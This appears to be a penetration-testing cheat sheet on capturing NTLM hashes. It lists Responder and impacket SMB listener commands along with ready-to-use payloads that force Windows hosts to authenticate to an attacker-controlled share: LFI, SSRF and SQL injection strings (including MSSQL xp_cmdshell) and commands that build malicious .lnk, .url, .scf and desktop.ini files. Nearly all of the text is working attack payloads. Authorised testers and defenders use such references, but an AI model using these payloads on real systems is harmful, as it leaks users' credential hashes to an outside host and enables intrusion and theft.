Capturing NTLM hashes

Listener

responder -I <interface>

impacket-smbserver share /dev/null -smb2support

Possible Attacks

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

Via web vulnerability

If you discover a web vulnerability (such as LFI, SQLI, XXE, SSRF, SSTI) that allows you to include remote files, you can exploit it to steal the NTLM hash of the user running the process. For example:

# LFI
?page=\\<attaker>\test

# SSRF
?url=file://<attaker>/test

# SQL Injection
?id=1' union select null,load_file('\\\\<attaker>\\test'),null-- -
  
  ## MSSQL
  ?id=1' union select null,(select x from OpenRowset(BULK '\\<attaker>\test',SINGLE_CLOB) R(x)),null-- -
  ?id=1' union select null,(EXEC xp_cmdshell 'dir \\<attaker>\test'),null-- -

Via .lnk file

# With powershell
$targetPath = "\\<attaker>\test" 
$shortcutPath = "C:\path\to\your\~shortcut.lnk" 
$WScriptShell = New-Object -ComObject WScript.Shell 
$shortcut = $WScriptShell.CreateShortcut($shortcutPath) 
$shortcut.TargetPath = $targetPath 
$shortcut.Save()

Via .url file

echo '[InternetShortcut]' > ~shortcut.url
echo 'URL=file:////<attaker>/test' >> ~shortcut.url

Via .scf file

Not working on newer Windows versions.

echo '[Shell]' > ~file.scf
echo 'Command=2' >> ~file.scf
echo 'IconFile=explorer.exe,3' >> ~file.scf
echo '[Taskbar]' >> ~file.scf
echo 'Command=ToggleDesktop' >> ~file.scf
echo '[InternetShortcut]' >> ~file.scf
echo 'URL=file:////<attaker>/test' >> ~file.scf

Via desktop.ini file

Not working on newer Windows versions.

# With powershell
echo '[.ShellClassInfo]' > desktop.ini
echo 'IconResource=\\<attaker>\test' >> desktop.ini
attrib +s +h desktop.ini